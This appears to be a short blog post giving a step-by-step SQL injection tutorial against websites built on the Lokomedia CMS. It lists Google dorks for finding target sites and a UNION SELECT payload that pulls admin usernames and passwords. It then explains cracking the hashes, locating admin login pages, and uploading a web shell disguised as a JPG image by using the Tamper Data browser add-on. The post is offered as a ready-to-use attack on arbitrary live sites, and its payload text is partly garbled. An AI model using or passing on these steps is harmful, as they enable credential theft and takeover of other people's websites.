Okay, this time i'm going to share Lokomedia SQL tutorial,
This tutorial is very easy, follow the steps below silently...
dorks:
- Inurl: static-1-pengantar.html
- Inurl: category-23-hiburan.html
- Inurl: things-about-kami.html
- Inurl: static-3-visidanmisi.html
- Inurl: Static-19-beasiswa.html
- Inurl: Static-22-kerjasama.html
Exploit: 'union select / *! 50000Concat
* / (username, 0x20, password) from +
users + - + - +
=================HOW TO USE IT
=====================
use DORK
- static-1-pengantar.html
then search
on GOOGLE , there will be a lot of SITES..
then select any site, Example http:/site.com/statis-1-pengantar.html
then enter this explot /statis--1'union select /*!
50000Concat*/
(username,0x20,password)+from+users-- +--+-pengantar.html
site.com/statis--1'union select /*!
50000Concat*/
(username,0x20,password)+from+users-- +--+-pengantar.html
There must be no spaces, or the exploit will
miss, and add (-)
before the figures on its site URL
It will bring out the web username and
password in a new page..
If its use HASH Password, Decrypt the
password in
If the password is found now look for admin login admin login in
-http://site.com/admin
-http://site.com/adminweb
-http://site.com/administrator
-Http://site.com/redaktur
If you successfully login, upload your shell
in photo gallery, or banner if it failed
to upload
favico on the web, Rename your shell to shell.php.JPG
(Adds .jpg format) and then on Tamper Data, can be downloaded in add ons to
the browser
you use..
Then get the shell access by clicking the
right mouse button, then copy and paste
the link address his error photo you
uploaded earlier, to a new url, and Done....
No comments:
Post a Comment